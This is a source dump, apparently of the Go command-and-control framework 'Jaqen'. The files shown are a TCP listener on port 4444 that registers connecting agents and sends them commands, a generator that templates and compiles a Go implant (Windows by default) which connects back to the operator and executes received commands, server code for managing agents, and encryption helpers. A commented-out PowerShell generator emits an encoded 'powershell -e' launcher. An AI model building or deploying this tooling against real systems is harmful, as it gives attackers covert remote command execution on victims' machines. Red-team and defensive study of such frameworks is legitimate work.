38 | 	smallbuf := make([]byte, 1)
39 | 	for {
40 | 		//read 1 byte at a time because reasons
41 | 		_, err := a.reader.Read(smallbuf)
42 | 		if err != nil {
43 | 			if err == io.EOF {
44 | 				fmt.Println("Agent disconnected")
45 | 				a.Running = false
46 | 				break
47 | 			}
48 | 			fmt.Println("Agent read error:")
49 | 			fmt.Println(err)
50 | 			break
51 | 		}
52 | 		a.outChan <- tcpResponse{UID: a.GetID(), resp: smallbuf[0]}
53 | 
54 | 	}
55 | 	a.conn.Close()
56 | 	if a.connection != nil {
57 | 		a.connection.connection = nil
58 | 	}
59 | 	a = nil
60 | }
61 | 
62 | func (a *agent) Write() {
63 | 	for data := range a.inChan {
64 | 		a.writer.WriteString(data)
65 | 		a.writer.Flush()
66 | 	}
67 | }
68 | 
69 | func (a *agent) Listen() {
70 | 	a.Running = true
71 | 	go a.Read()
72 | 	go a.Write()
73 | }
74 | 


--------------------------------------------------------------------------------
/libJaqen/server/listeners/tcpListener/tcp.go:
--------------------------------------------------------------------------------
  1 | package tcpListener
  2 | 
  3 | import (
  4 | 	"bufio"
  5 | 	"errors"
  6 | 	"fmt"
  7 | 	"net"
  8 | 	"strings"
  9 | 	"sync"
 10 | 	"time"
 11 | 
 12 | 	"github.com/c-sto/Jaqen/libJaqen/server"
 13 | )
 14 | 
 15 | type tcpResponse struct {
 16 | 	UID  string
 17 | 	resp byte
 18 | }
 19 | 
 20 | type JaqenTCPListener struct {
 21 | 	options         server.ListenerOptions
 22 | 	tcpResponseChan chan tcpResponse
 23 | 	CheckinChan     chan server.Checkin
 24 | 	ResponseChan    chan server.Command
 25 | 
 26 | 	agents          map[string]*agent
 27 | 	aMut            *sync.RWMutex
 28 | 	pendingCommands map[string][]string
 29 | 	pcMut           *sync.RWMutex
 30 | 
 31 | 	running bool
 32 | }
 33 | 
 34 | func (t *JaqenTCPListener) marshalResponses() {
 35 | 	buffer := []byte{}
 36 | 	for {
 37 | 		b := <-t.tcpResponseChan
 38 | 		buffer = append(buffer, b.resp)
 39 | 		if string(b.resp) == "\n" {
 40 | 			t.ResponseChan <- server.Command{
 41 | 				UID:      b.UID,
 42 | 				Response: buffer,
 43 | 			}
 44 | 
 45 | 			buffer = []byte{}
 46 | 		}
 47 | 	}
 48 | }
 49 | 
 50 | func (t *JaqenTCPListener) Init() (server.SignalChans, error) {
 51 | 	t.options = server.ListenerOptions{}.New()
 52 | 	t.pendingCommands = make(map[string][]string)
 53 | 	t.pcMut = &sync.RWMutex{}
 54 | 	t.aMut = &sync.RWMutex{}
 55 | 	t.CheckinChan = make(chan server.Checkin, 10)
 56 | 	t.ResponseChan = make(chan server.Command, 10)
 57 | 	t.tcpResponseChan = make(chan tcpResponse, 1)
 58 | 	t.options.Set("port", "4444")
 59 | 	t.options.Set("ip", "0.0.0.0")
 60 | 	t.options.Set("exectime", "500")     //much faster than dns default, but still slow enough to simulate australian internet
 61 | 	t.options.Set("checkintime", "1000") //dunno fi this will even get used tbh
 62 | 
 63 | 	t.agents = make(map[string]*agent)
 64 | 
 65 | 	r := server.SignalChans{
 66 | 		CheckinChan:  t.CheckinChan,
 67 | 		ResponseChan: t.ResponseChan,
 68 | 	}
 69 | 	go t.marshalResponses()
 70 | 	go t.listenCheckins()
 71 | 
 72 | 	t.running = false
 73 | 
 74 | 	return r, nil
 75 | }
 76 | 
 77 | func (t *JaqenTCPListener) listen() {
 78 | 	port, _ := t.options.Get("port")
 79 | 	ip, _ := t.options.Get("ip")
 80 | 	l, err := net.Listen("tcp", ip+":"+port)
 81 | 	if err != nil {
 82 | 		fmt.Println(err) //signal not running
 83 | 		t.Stop()
 84 | 		return
 85 | 	}
 86 | 	for {
 87 | 		conn, err := l.Accept()
 88 | 		if err != nil {
 89 | 			fmt.Println(err)
 90 | 		}
 91 | 		go func() {
 92 | 			a := newAgent(conn, t.tcpResponseChan)
 93 | 			t.aMut.Lock()
 94 | 			t.agents[a.GetID()] = a
 95 | 			t.aMut.Unlock()
 96 | 			t.CheckinChan <- server.Checkin{
 97 | 				UID:          a.GetID(),
 98 | 				ListenerName: t.GetName(),
 99 | 				CheckinTime:  time.Now(),
100 | 			}
101 | 		}()
102 | 	}
103 | }
104 | 
105 | func (t *JaqenTCPListener) listenCheckins() {
106 | 	tix := time.NewTicker(time.Second * 5)
107 | 	for {
108 | 		select {
109 | 		case <-tix.C:
110 | 			t.aMut.Lock()
111 | 			for k, v := range t.agents {
112 | 				if !v.Running {
113 | 					delete(t.agents, k)
114 | 					continue
115 | 				}
116 | 				t.CheckinChan <- server.Checkin{
117 | 					UID:          v.GetID(),
118 | 					ListenerName: t.GetName(),
119 | 					CheckinTime:  time.Now(),
120 | 				}
121 | 
122 | 			}
123 | 			t.aMut.Unlock()
124 | 		}
125 | 	}
126 | }
127 | 
128 | func newAgent(con net.Conn, outChan chan tcpResponse) *agent {
129 | 	writer := bufio.NewWriter(con)
130 | 	reader := bufio.NewReader(con)
131 | 
132 | 	a := &agent{
133 | 		inChan:  make(chan string),
134 | 		outChan: outChan,
135 | 		conn:    con,
136 | 		reader:  reader,
137 | 		writer:  writer,
138 | 	}
139 | 
140 | 	a.Listen()
141 | 
142 | 	return a
143 | }
144 | 
145 | func (t JaqenTCPListener) GetName() string {
146 | 	return "tcp"
147 | }
148 | 
149 | func (t *JaqenTCPListener) SetOption(k, v string) {
150 | 	t.options.Set(k, v)
151 | }
152 | 
153 | func (t *JaqenTCPListener) GetOption(s string) (string, error) {
154 | 	if x, ok := t.options.Get(s); ok {
155 | 		return x, nil
156 | 	}
157 | 	return "", errors.New("Option not found")
158 | }
159 | 
160 | func (t *JaqenTCPListener) GetOptions() func(string) []string {
161 | 	return t.options.GetKeys()
162 | }
163 | 
164 | func (t *JaqenTCPListener) Kill(id string) {
165 | 
166 | }
167 | 
168 | func (t *JaqenTCPListener) SendCommand(agent, command string) {
169 | 	//ensure commands begin with a newline
170 | 	if string(command[len(command)-1]) != "\n" {
171 | 		command = command + "\n"
172 | 	}
173 | 	t.aMut.Lock()
174 | 	t.agents[agent].inChan <- command
175 | 	t.aMut.Unlock()
176 | }
177 | 
178 | func (t *JaqenTCPListener) Start() error {
179 | 	p, _ := t.GetOption("port")
180 | 	fmt.Println("Starting TCP Listerner on port " + p)
181 | 	go t.listen()
182 | 	t.running = true
183 | 	return nil
184 | }
185 | 
186 | func (t *JaqenTCPListener) Stop() {}
187 | 
188 | func (t JaqenTCPListener) GenerateAgentFormats() []string {
189 | 	return []string{"golang"} // soon.jpg ,"powershell", "bash"}
190 | }
191 | 
192 | func (t JaqenTCPListener) Generate(s string) []byte {
193 | 	switch strings.ToLower(s) {
194 | 	//case "powershell":
195 | 	//	return []byte(t.genPowershellAgent())
196 | 	case "golang":
197 | 		return t.genGolangAgent()
198 | 		//case "bash":
199 | 		//	return []byte(t.genBashAgent())
200 | 	}
201 | 	return []byte{}
202 | }
203 | 
204 | func (t JaqenTCPListener) GetInfo() server.ListenerInfo {
205 | 	//copy the options map to avoid bad stuff
206 | 	newMap := t.options.CloneMap()
207 | 
208 | 	return server.ListenerInfo{
209 | 		Name:    t.GetName(),
210 | 		Running: t.running,
211 | 		Options: newMap,
212 | 	}
213 | }
214 | 


--------------------------------------------------------------------------------
/libJaqen/server/listeners/tcpListener/tcpAgent.go:
--------------------------------------------------------------------------------
  1 | package tcpListener
  2 | 
  3 | import (
  4 | 	"bytes"
  5 | 	"fmt"
  6 | 	"io/ioutil"
  7 | 	"os"
  8 | 	"path"
  9 | 	"text/template"
 10 | 
 11 | 	"github.com/c-sto/Jaqen/libJaqen/server"
 12 | 	"github.com/gobuffalo/packr"
 13 | )
 14 | 
 15 | func (d JaqenTCPListener) genGolangAgent() []byte {
 16 | 	//Thanks to moloch-- and the rosie project for figuring out how to do the generation stuff mostly good https://github.com/moloch--/rosie
 17 | 	host, _ := d.GetOption("ip")
 18 | 	port, _ := d.GetOption("port")
 19 | 	checkinTime, _ := d.GetOption("checkintime")
 20 | 	execTime, _ := d.GetOption("exectime")
 21 | 
 22 | 	codeStruct := server.AgentCode{
 23 | 		CmdExecTimeout: execTime,
 24 | 		CheckinMaxTime: checkinTime,
 25 | 		Imports: `*/
 26 | 		"bufio"
 27 | 		"net"
 28 | 		"os"
 29 | 		/*`,
 30 | 		GlobalVars: `
 31 | 		*/ //global
 32 | type tcpObjs struct {
 33 | 	inChan chan string //data to send
 34 | 	//outChan    chan tcpResponse //data received
 35 | 	reader     *bufio.Reader
 36 | 	writer     *bufio.Writer
 37 | 	conn       net.Conn
 38 | 	connection *agent
 39 | 	id         string
 40 | 	Running    bool
 41 | 	commands   chan string
 42 | }
 43 | 
 44 | var tO tcpObjs
 45 | 
 46 | func getCommandFromSocket() {
 47 | 	for {
 48 | 		if !tO.Running {
 49 | 			randyboi := rand.Intn(1000) //1 seconds variance
 50 | 			time.Sleep(time.Duration(randyboi) * time.Millisecond)
 51 | 			continue
 52 | 		}
 53 | 		text, _ := tO.reader.ReadString('\n')
 54 | 		tO.commands <- text
 55 | 	}
 56 | }
 57 | 
 58 | /*
 59 | `,
 60 | 		Checkin: `*/
 61 | 		//checkin
 62 | 		//check if the tcp socket still connected
 63 | 		if !tO.Running {
 64 | 			// if not connected, try to connect again
 65 | 			c, err := net.Dial("tcp", a.settings.Get("host")+":"+a.settings.Get("port"))
 66 | 			if err == nil {
 67 | 
 68 | 				tO.conn = c
 69 | 				tO.reader = bufio.NewReader(tO.conn)
 70 | 				tO.Running = true
 71 | 			} else {
 72 | 				os.Exit(1)
 73 | 			}
 74 | 		}
 75 | 		/*`,
 76 | 		Init: `*/ //init
 77 | 		//set port and host
 78 | 		tO = tcpObjs{
 79 | 			Running:  false,
 80 | 			inChan:   make(chan string),
 81 | 			commands: make(chan string, 5),
 82 | 			//outChan: make(chan string),
 83 | 		}
 84 | 		a.settings.Set("port", "` + port + `")
 85 | 		a.settings.Set("host", "` + host + `")
 86 | 		go getCommandFromSocket()
 87 | 		/*`,
 88 | 		GetCommand: `*/ //GetCommand
 89 | 		select {
 90 | 		case a.cmd = <-tO.commands:
 91 | 			return true
 92 | 		default:
 93 | 			return false
 94 | 		}
 95 | 		/*`,
 96 | 		ExecCommand: `*//*`,
 97 | 		SendResponse: `*/	
 98 | 		tO.conn.Write(b)
 99 | 		/*`,
100 | 	}
101 | 
102 | 	codeStruct.AVoid("")
103 | 
104 | 	boxs, err := packr.NewBox("../../../").MustString("agent/agent.go")
105 | 	if err != nil {
106 | 		fmt.Println(err)
107 | 		return []byte("")
108 | 	}
109 | 
110 | 	code, err := template.New("goagent").Parse(boxs)
111 | 	if err != nil {
112 | 		fmt.Println(err)
113 | 		return []byte("")
114 | 	}
115 | 
116 | 	var buf bytes.Buffer
117 | 
118 | 	err = code.Execute(&buf, codeStruct)
119 | 
120 | 	if err != nil {
121 | 		fmt.Println(err)
122 | 	}
123 | 
124 | 	binDir, err := ioutil.TempDir("", "jaqen-build")
125 | 
126 | 	if err != nil {
127 | 		fmt.Println(err)
128 | 	}
129 | 
130 | 	workingDir := path.Join(binDir, "agent.go")
131 | 
132 | 	fmt.Println("working", workingDir)
133 | 	codeFile, err := os.Create(workingDir)
134 | 	if err != nil {
135 | 		fmt.Println(err)
136 | 	}
137 | 
138 | 	fmt.Println("Generating code to: " + codeFile.Name())
139 | 
140 | 	err = code.Execute(codeFile, codeStruct)
141 | 
142 | 	if err != nil {
143 | 		fmt.Println(err)
144 | 	}
145 | 
146 | 	cgo, err := d.GetOption("cgo")
147 | 	if err != nil {
148 | 		cgo = "0"
149 | 	}
150 | 	goos, err := d.GetOption("goos")
151 | 	if err != nil {
152 | 		goos = "windows"
153 | 	}
154 | 	goarch, err := d.GetOption("goarch")
155 | 	if err != nil {
156 | 		goos = "x64"
157 | 	}
158 | 
159 | 	outfile, _ := d.GetOption("outfile")
160 | 
161 | 	buildr := []string{"build"}
162 | 	if outfile != "" {
163 | 		buildr = append(buildr, "-o")
164 | 		buildr = append(buildr, outfile)
165 | 	}
166 | 
167 | 	goroot := server.GetGoRoot()
168 | 	gopath := server.GetGoPath()
169 | 
170 | 	err = server.GoCmd(server.GoConfig{
171 | 		CGO:    cgo,
172 | 		GOOS:   goos,
173 | 		GOARCH: goarch,
174 | 		GOROOT: goroot,
175 | 		GOPATH: gopath,
176 | 	},
177 | 		binDir,
178 | 		buildr,
179 | 	)
180 | 
181 | 	if err != nil {
182 | 		fmt.Println(err)
183 | 		return []byte{}
184 | 	}
185 | 
186 | 	return []byte{} //buf.Bytes()
187 | }
188 | 
189 | /*
190 | type powershellagent struct {
191 | 	Domain string
192 | 	Split  int
193 | }
194 | 
195 | func (d JaqenTCPListener) genBashAgent() string {
196 | 	dom, _ := d.GetOption("domain")
197 | 
198 | 	spl := 60
199 | 
200 | 	st, e := d.GetOption("split")
201 | 	if e == nil {
202 | 		spl, e = strconv.Atoi(st)
203 | 		if e != nil {
204 | 			fmt.Println(e)
205 | 		}
206 | 	}
207 | 
208 | 	cfg := powershellagent{
209 | 		Domain: dom,
210 | 		Split:  spl,
211 | 	}
212 | 	boxs, err := packr.NewBox("./").MustString("bashtcpagent.sh")
213 | 
214 | 	if err != nil {
215 | 		fmt.Println(err)
216 | 		return ""
217 | 	}
218 | 	code, err := template.New("bashtcpagent").Parse(boxs)
219 | 	if err != nil {
220 | 		fmt.Println(err)
221 | 		return ""
222 | 	}
223 | 	var buf bytes.Buffer
224 | 
225 | 	err = code.Execute(&buf, cfg)
226 | 	if err != nil {
227 | 		fmt.Println(err)
228 | 	}
229 | 	return buf.String()
230 | }
231 | 
232 | func (d JaqenTCPListener) genPowershellAgent() string {
233 | 	dom, _ := d.GetOption("domain")
234 | 
235 | 	spl := 60
236 | 
237 | 	st, e := d.GetOption("split")
238 | 	if e == nil {
239 | 		spl, e = strconv.Atoi(st)
240 | 		if e != nil {
241 | 			fmt.Println(e)
242 | 		}
243 | 	}
244 | 
245 | 	cfg := powershellagent{
246 | 		Domain: dom,
247 | 		Split:  spl,
248 | 	}
249 | 	boxs, err := packr.NewBox("./").MustString("tcpagent.ps1")
250 | 
251 | 	if err != nil {
252 | 		fmt.Println(err)
253 | 		return ""
254 | 	}
255 | 	code, err := template.New("tcpagent").Parse(boxs)
256 | 	if err != nil {
257 | 		fmt.Println(err)
258 | 		return ""
259 | 	}
260 | 	var buf bytes.Buffer
261 | 
262 | 	err = code.Execute(&buf, cfg)
263 | 	if err != nil {
264 | 		fmt.Println(err)
265 | 	}
266 | 	x, _ := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder().String(buf.String())
267 | 	return "powershell -e " + base64.StdEncoding.EncodeToString([]byte(x))
268 | 	//return x //buf.String()
269 | }*/
270 | 


--------------------------------------------------------------------------------
/libJaqen/server/server.go:
--------------------------------------------------------------------------------
  1 | package server
  2 | 
  3 | import (
  4 | 	"fmt"
  5 | 	"math/rand"
  6 | 	"sync"
  7 | 	"time"
  8 | 
  9 | 	"github.com/fatih/color"
 10 | )
 11 | 
 12 | type OutType int
 13 | 
 14 | const (
 15 | 	//CHECKIN - checkin output
 16 | 	CHECKIN OutType = iota
 17 | 	//RESPONSE - response output
 18 | 	RESPONSE
 19 | 	//INFO - informational output
 20 | 	INFO
 21 | 	//ERR - error output
 22 | 	ERR
 23 | )
 24 | 
 25 | type Output struct {
 26 | 	Val   string
 27 | 	Type  OutType
 28 | 	Level int
 29 | }
 30 | 
 31 | type JaqenServer struct {
 32 | 	listeners map[string]Listener
 33 | 	lMutex    *sync.RWMutex
 34 | 
 35 | 	responseChans chan Command
 36 | 	checkinChans  chan Checkin
 37 | 
 38 | 	activeAgents map[string]Agent
 39 | 	aMut         *sync.RWMutex
 40 | 	outputChan   chan Output
 41 | }
 42 | 
 43 | type Command struct {
 44 | 	UID      string
 45 | 	Cmd      string
 46 | 	Response []byte
 47 | }
 48 | 
 49 | type Agent struct {
 50 | 	UID         string
 51 | 	Listener    string
 52 | 	Commands    map[string]Command
 53 | 	LastCheckin time.Time
 54 | }
 55 | 
 56 | func (j *JaqenServer) GetOutputChan() chan Output {
 57 | 	return j.outputChan
 58 | }
 59 | 
 60 | func (j *JaqenServer) Init() error {
 61 | 	j.lMutex = &sync.RWMutex{}
 62 | 	j.aMut = &sync.RWMutex{}
 63 | 	j.listeners = make(map[string]Listener)
 64 | 	j.activeAgents = make(map[string]Agent)
 65 | 	j.checkinChans = make(chan Checkin)
 66 | 	j.responseChans = make(chan Command)
 67 | 	j.outputChan = make(chan Output, 10)
 68 | 	go j.listenCheckins()
 69 | 	go j.listenResponses()
 70 | 	return nil
 71 | }
 72 | 
 73 | func (j *JaqenServer) addAgent(s string, a Agent) {
 74 | 	j.aMut.Lock()
 75 | 	defer j.aMut.Unlock()
 76 | 
 77 | 	j.activeAgents[s] = a
 78 | }
 79 | 
 80 | func (j *JaqenServer) GetAgents() func(string) []string {
 81 | 	j.aMut.RLock()
 82 | 	defer j.aMut.RUnlock()
 83 | 
 84 | 	return func(line string) []string {
 85 | 		a := make([]string, 0)
 86 | 		for k := range j.activeAgents { //other options go here?
 87 | 			a = append(a, k)
 88 | 		}
 89 | 		return a
 90 | 	}
 91 | 
 92 | }
 93 | 
 94 | func (j *JaqenServer) AgentExecute(agent, command string) {
 95 | 	//get agent
 96 | 	j.aMut.RLock()
 97 | 	defer j.aMut.RUnlock()
 98 | 
 99 | 	a := j.activeAgents[agent]
100 | 
101 | 	//get listener
102 | 	j.lMutex.Lock()
103 | 	defer j.lMutex.Unlock()
104 | 
105 | 	l := j.listeners[a.Listener]
106 | 
107 | 	l.SendCommand(a.UID, command)
108 | 
109 | }
110 | 
111 | //show output
112 | func (j *JaqenServer) AgentGetOutput(agent, command string) {
113 | 
114 | }
115 | 
116 | //AgentKill sends a kill command to the specified agent
117 | func (j *JaqenServer) AgentKill(agent string) {
118 | 	j.aMut.Lock()
119 | 	defer j.aMut.Unlock()
120 | 
121 | 	l := j.activeAgents[agent].Listener
122 | 	j.listeners[l].Kill(agent)
123 | 	delete(j.activeAgents, agent)
124 | }
125 | 
126 | func (j *JaqenServer) addCheckinChan(c <-chan Checkin) {
127 | 	go func(cc <-chan Checkin) {
128 | 		for s := range cc {
129 | 			j.checkinChans <- s
130 | 		}
131 | 	}(c)
132 | }
133 | 
134 | func (j *JaqenServer) addResponseChan(c <-chan Command) {
135 | 	go func(cc <-chan Command) {
136 | 		for s := range cc {
137 | 			j.responseChans <- s
138 | 		}
139 | 	}(c)
140 | }
141 | 
142 | func (j *JaqenServer) listenCheckins() {
143 | 	ticker := time.NewTicker(5 * time.Second)
144 | 	for {
145 | 		select {
146 | 		case c := <-j.checkinChans:
147 | 			j.aMut.Lock()
148 | 			if _, ok := j.activeAgents[c.UID]; ok {
149 | 				x := j.activeAgents[c.UID]
150 | 				x.LastCheckin = c.CheckinTime
151 | 				j.activeAgents[c.UID] = x
152 | 				j.aMut.Unlock()
153 | 				continue
154 | 			}
155 | 			j.aMut.Unlock()
156 | 			j.outputChan <- Output{
157 | 				Val: fmt.Sprintf("\n%s[%s]: %s", color.New(color.FgYellow).SprintfFunc()("Agent checkin"), c.ListenerName, color.New(color.Bold).SprintfFunc()(c.UID)),
158 | 			}
159 | 			a := Agent{
160 | 				UID:      c.UID,
161 | 				Commands: make(map[string]Command),
162 | 				Listener: c.ListenerName,
163 | 			}
164 | 			j.addAgent(c.UID, a)
165 | 		case <-ticker.C:
166 | 			agents := j.GetAgents()("")
167 | 			for _, x := range agents {
168 | 				a, r := j.getAgent(x)
169 | 				if !r {
170 | 					continue
171 | 				}
172 | 
173 | 				//todo: set checkin timeout to listener dependent
174 | 				if !a.LastCheckin.IsZero() && time.Since(a.LastCheckin) > (time.Duration(30)*time.Second) {
175 | 					j.removeAgent(x)
176 | 				}
177 | 			}
178 | 		}
179 | 	}
180 | }
181 | 
182 | func (j *JaqenServer) removeAgent(s string) {
183 | 	j.aMut.Lock()
184 | 	defer j.aMut.Unlock()
185 | 	fmt.Println("Removing ", s, "due to timeout")
186 | 	delete(j.activeAgents, s)
187 | }
188 | 
189 | func (j *JaqenServer) getAgent(s string) (Agent, bool) {
190 | 	j.aMut.RLock()
191 | 	defer j.aMut.RUnlock()
192 | 	a, ok := j.activeAgents[s]
193 | 	return a, ok
194 | }
195 | 
196 | func (j *JaqenServer) listenResponses() {
197 | 	for {
198 | 		select {
199 | 		case c := <-j.responseChans:
200 | 			j.addResponse(c)
201 | 		}
202 | 	}
203 | }
204 | 
205 | func (j *JaqenServer) addResponse(c Command) {
206 | 	//gzzzzz need to keep map of responses so we can return later
207 | 	r := c.Response
208 | 
209 | 	if len(c.Response) > 1 && string(c.Response[len(c.Response)-1]) == "\n" {
210 | 		r = r[:len(c.Response)-1]
211 | 
212 | 	}
213 | 	j.outputChan <- Output{
214 | 		Val: fmt.Sprintf("%s[%s] %s: %s", color.New(color.FgGreen).SprintfFunc()("Response"), c.UID, c.Cmd, string(r)),
215 | 	}
216 | }
217 | 
218 | //GetListeners returns a slice of listener info objects
219 | func (j *JaqenServer) GetListeners() []ListenerInfo {
220 | 	j.lMutex.RLock()
221 | 	defer j.lMutex.RUnlock()
222 | 
223 | 	r := []ListenerInfo{}
224 | 	for k, _ := range j.listeners {
225 | 		i := j.listeners[k].GetInfo()
226 | 		i.Name = k
227 | 		r = append(r, i)
228 | 	}
229 | 	return r
230 | }
231 | 
232 | //StopListener calls the 'Stop()' function on the specified listener
233 | func (j *JaqenServer) StopListener(k string) {
234 | 	j.lMutex.Lock()
235 | 	defer j.lMutex.Unlock()
236 | 	j.listeners[k].Stop()
237 | }
238 | 
239 | //RemoveListener will stop and remove the specified listener
240 | func (j *JaqenServer) RemoveListener(k string) {
241 | 	j.lMutex.Lock()
242 | 	defer j.lMutex.Unlock()
243 | 	if j.listeners[k].GetInfo().Running {
244 | 		j.listeners[k].Stop()
245 | 	}
246 | 	delete(j.listeners, k)
247 | }
248 | 
249 | //AddListener will add (but will not start) a listener to the listener list
250 | func (j *JaqenServer) AddListener(l Listener) (string, error) {
251 | 	j.lMutex.Lock()
252 | 	defer j.lMutex.Unlock()
253 | 	chans, e := l.Init()
254 | 
255 | 	if e != nil {
256 | 		return "", e
257 | 	}
258 | 
259 | 	j.addCheckinChan(chans.CheckinChan)
260 | 	j.addResponseChan(chans.ResponseChan)
261 | 
262 | 	//check for existing listener of same type
263 | 	name := l.GetName()
264 | 	for {
265 | 		if _, ok := j.listeners[name]; ok {
266 | 			//already have listener, add unique suffix
267 | 			name = name + "-" + RandStringRunes(2)
268 | 		} else {
269 | 			break
270 | 		}
271 | 	}
272 | 	j.listeners[name] = l
273 | 
274 | 	return name, nil
275 | }
276 | 
277 | //SetOption will set the specified options for the specified listener
278 | func (j *JaqenServer) SetOption(listener, option, value string) {
279 | 	j.lMutex.Lock()
280 | 	defer j.lMutex.Unlock()
281 | 	j.listeners[listener].SetOption(option, value)
282 | }
283 | 
284 | func (j *JaqenServer) GetOption(listener, option string) (string, error) {
285 | 	j.lMutex.RLock()
286 | 	defer j.lMutex.RUnlock()
287 | 	o, e := j.listeners[listener].GetOption(option)
288 | 	return o, e
289 | }
290 | 
291 | func (j *JaqenServer) GetOptions(listener string) (func(string) []string, error) {
292 | 	j.lMutex.RLock()
293 | 	defer j.lMutex.RUnlock()
294 | 	return j.listeners[listener].GetOptions(), nil
295 | }
296 | 
297 | func (j *JaqenServer) Start(listener string) error {
298 | 	j.lMutex.Lock()
299 | 	defer j.lMutex.Unlock()
300 | 	return j.listeners[listener].Start()
301 | }
302 | 
303 | func (j *JaqenServer) GenerateAgent(l, f string) []byte {
304 | 
305 | 	return j.listeners[l].Generate(f)
306 | }
307 | 
308 | func (j *JaqenServer) GetAgentFormats(l string) []string {
309 | 	return j.listeners[l].GenerateAgentFormats()
310 | }
311 | 
312 | func RandStringRunes(n int) string {
313 | 	rand.Seed(time.Now().UnixNano()) //probably a bad idea, whatever
314 | 	letterRunes := []byte("abcdefghijklmnopqrstuvwxyz1234567890")
315 | 	b := make([]byte, n)
316 | 	for i := range b {
317 | 		b[i] = letterRunes[rand.Intn(len(letterRunes))]
318 | 	}
319 | 	return string(b)
320 | }
321 | 


--------------------------------------------------------------------------------
/libJaqen/server/util/util.go:
--------------------------------------------------------------------------------
  1 | package util
  2 | 
  3 | import (
  4 | 	"bytes"
  5 | 	"crypto"
  6 | 	"crypto/aes"
  7 | 	"crypto/cipher"
  8 | 	"crypto/hmac"
  9 | 	"crypto/rand"
 10 | 	_ "crypto/sha256"
 11 | 	"encoding/base64"
 12 | 	"encoding/hex"
 13 | 	"errors"
 14 | )
 15 | 
 16 | //https://blog.questionable.services/article/generating-secure-random-numbers-crypto-rand/
 17 | 
 18 | // GenerateRandomBytes returns securely generated random bytes.
 19 | // It will return an error if the system's secure random
 20 | // number generator fails to function correctly, in which
 21 | // case the caller should not continue.
 22 | func GenerateRandomBytes(n int) ([]byte, error) {
 23 | 	b := make([]byte, n)
 24 | 	_, err := rand.Read(b)
 25 | 	// Note that err == nil only if we read len(b) bytes.
 26 | 	if err != nil {
 27 | 		return nil, err
 28 | 	}
 29 | 
 30 | 	return b, nil
 31 | }
 32 | 
 33 | // GenerateRandomString returns a URL-safe, base64 encoded
 34 | // securely generated random string.
 35 | // It will return an error if the system's secure random
 36 | // number generator fails to function correctly, in which
 37 | // case the caller should not continue.
 38 | func GenerateRandomString(s int) (string, error) {
 39 | 	b, err := GenerateRandomBytes(s)
 40 | 	return base64.URLEncoding.EncodeToString(b), err
 41 | }
 42 | 
 43 | //EncryptString will return an AES encrypted byte array of the given plaintext string, using the key and IV supplied
 44 | //the Ciphertext will have the IV/Nonce prefixed to the blob
 45 | func EncryptString(plaintext string, key []byte) ([]byte, error) {
 46 | 	block, e := aes.NewCipher(key)
 47 | 	if e != nil {
 48 | 		return []byte{}, e
 49 | 	}
 50 | 	iv, e := GenerateRandomBytes(aes.BlockSize)
 51 | 
 52 | 	mode := cipher.NewCBCEncrypter(block, iv) //, iv []byte) NewGCM(block) //, iv)
 53 | 
 54 | 	pt, e := Pkcs7Pad([]byte(plaintext), aes.BlockSize)
 55 | 	ct := make([]byte, len(pt))
 56 | 
 57 | 	mode.CryptBlocks(ct, pt)
 58 | 
 59 | 	ct = append(iv, ct...)
 60 | 
 61 | 	//authenticate
 62 | 	mac := hmac.New(crypto.SHA256.New, key)
 63 | 	mac.Write(ct)
 64 | 	mmac := mac.Sum(nil)
 65 | 
 66 | 	ct = append(mmac, ct...)
 67 | 
 68 | 	return ct, nil
 69 | }
 70 | 
 71 | //EncryptStringToHex will take a plaintext, key and IV, and encrypt (using CBC), returning a hex encoded string
 72 | func EncryptStringToHex(plaintext string, key []byte) (string, error) {
 73 | 	b, e := EncryptString(plaintext, key)
 74 | 	if e != nil {
 75 | 		return "", e
 76 | 	}
 77 | 	s := hex.EncodeToString(b)
 78 | 	return s, e
 79 | }
 80 | 
 81 | func Decrypt(ct, key []byte) ([]byte, error) {
 82 | 	//check MAC before anything else
 83 | 	ctmac := ct[:crypto.SHA256.Size()]
 84 | 
 85 | 	mac := hmac.New(crypto.SHA256.New, key)
 86 | 	mac.Write(ct[crypto.SHA256.Size():])
 87 | 	ourmac := mac.Sum(nil)
 88 | 
 89 | 	if !hmac.Equal(ctmac, ourmac) {
 90 | 		return []byte{}, errors.New("HMAC Fail")
 91 | 	}
 92 | 
 93 | 	ct = ct[crypto.SHA256.Size():]
 94 | 
 95 | 	block, e := aes.NewCipher(key)
 96 | 	if e != nil {
 97 | 		return []byte{}, e
 98 | 	}
 99 | 
100 | 	mode := cipher.NewCBCDecrypter(block, ct[:aes.BlockSize]) //NewGCM(block) //, iv)
101 | 	if e != nil {
102 | 		return []byte{}, e
103 | 	}
104 | 
105 | 	ct = ct[aes.BlockSize:]
106 | 	pt := make([]byte, len(ct))
107 | 
108 | 	mode.CryptBlocks(pt, ct)
109 | 
110 | 	//unpad
111 | 	pt, e = Pkcs7Unpad(pt, aes.BlockSize)
112 | 
113 | 	return pt, e
114 | }
115 | 
116 | func DecryptToString(ct, key []byte) (string, error) {
117 | 	pt, e := Decrypt(ct, key)
118 | 	if e != nil {
119 | 		return "", e
120 | 	}
121 | 	return string(pt), nil
122 | }
123 | 
124 | func DecryptHexStringToString(ct string, key []byte) (string, error) {
125 | 	decodedCt, e := hex.DecodeString(ct)
126 | 	if e != nil {
127 | 		return "", e
128 | 	}
129 | 
130 | 	return DecryptToString(decodedCt, key)
131 | }
132 | 
133 | //https://github.com/go-web/tokenizer/blob/master/pkcs7.go
134 | 
135 | var (
136 | 	// ErrInvalidBlockSize indicates hash blocksize <= 0.
137 | 	ErrInvalidBlockSize = errors.New("invalid blocksize")
138 | 
139 | 	// ErrInvalidPKCS7Data indicates bad input to PKCS7 pad or unpad.
140 | 	ErrInvalidPKCS7Data = errors.New("invalid PKCS7 data (empty or not padded)")
141 | 
142 | 	// ErrInvalidPKCS7Padding indicates PKCS7 unpad fails to bad input.
143 | 	ErrInvalidPKCS7Padding = errors.New("invalid padding on input")
144 | )
145 | 
146 | func Pkcs7Pad(b []byte, blocksize int) ([]byte, error) {
147 | 	if blocksize <= 0 {
148 | 		return nil, ErrInvalidBlockSize
149 | 	}
150 | 	if b == nil || len(b) == 0 {
151 | 		return nil, ErrInvalidPKCS7Data
152 | 	}
153 | 	n := blocksize - (len(b) % blocksize)
154 | 	pb := make([]byte, len(b)+n)
155 | 	copy(pb, b)
156 | 	copy(pb[len(b):], bytes.Repeat([]byte{byte(n)}, n))
157 | 	return pb, nil
158 | }
159 | 
160 | func Pkcs7Unpad(b []byte, blocksize int) ([]byte, error) {
161 | 	if blocksize <= 0 {
162 | 		return nil, ErrInvalidBlockSize
163 | 	}
